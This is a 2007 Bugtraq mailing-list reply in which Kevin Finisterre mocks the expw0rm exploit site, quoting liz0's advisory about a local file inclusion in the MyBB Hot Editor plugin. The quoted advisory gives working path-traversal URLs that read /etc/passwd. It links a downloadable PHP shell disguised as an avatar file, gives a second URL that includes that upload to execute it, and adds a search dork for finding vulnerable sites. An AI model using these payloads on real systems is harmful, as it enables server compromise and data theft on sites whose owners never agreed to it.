Re: Mybb Hot Editor Plugin Local File Inclusion

To: liz0@xxxxxxxxxxx
Subject: Re: Mybb Hot Editor Plugin Local File Inclusion
From: "Kevin Finisterre (lists)" <kf_lists@xxxxxxxxxxxxxxxxxxx>
Date: Mon, 9 Apr 2007 13:08:18 -0400
Cc: bugtraq@xxxxxxxxxxxxxxxxx, str0ke <str0ke@xxxxxxxxxxx>
In-reply-to: <20070409134018.32702.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20070409134018.32702.qmail@xxxxxxxxxxxxxxxxx>

expw0rm dude? That is a pretty weak attempt at mirroring milw0rm.comyou pretty much copied str0kes layout except you added your owncrappy colors. how nice of you.


-KF

On Apr 9, 2007, at 9:40 AM, liz0@xxxxxxxxxxx wrote:

<?php
/*
Vendor : Liz0ziM
Web    : www.expw0rm.com
Mail   : liz0@xxxxxxxxxxx
---------------------------------------
Vul. Code : keyboard.php line 3


        require_once "./vk_code/$first";
----------------------------------------


*/
http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd
And

upload php shell = > http://www.expw0rm.com/avatar_36.zip
http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif => target isn't show with ie.plese you usefirefox
Dork: "MTR Paket :"
?>

// Exploit Worm www.expw0rm.com
orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html

References:
- Mybb Hot Editor Plugin Local File Inclusion
  - From: liz0

Prev by Date: Hot Editor v4.0 Local File Inclusion
Next by Date: xodagallery Remote Code Execution Vulnerability
Previous by thread: Mybb Hot Editor Plugin Local File Inclusion
Next by thread: Re: Re: Mybb Hot Editor Plugin Local File Inclusion
Index(es):
- Date
- Thread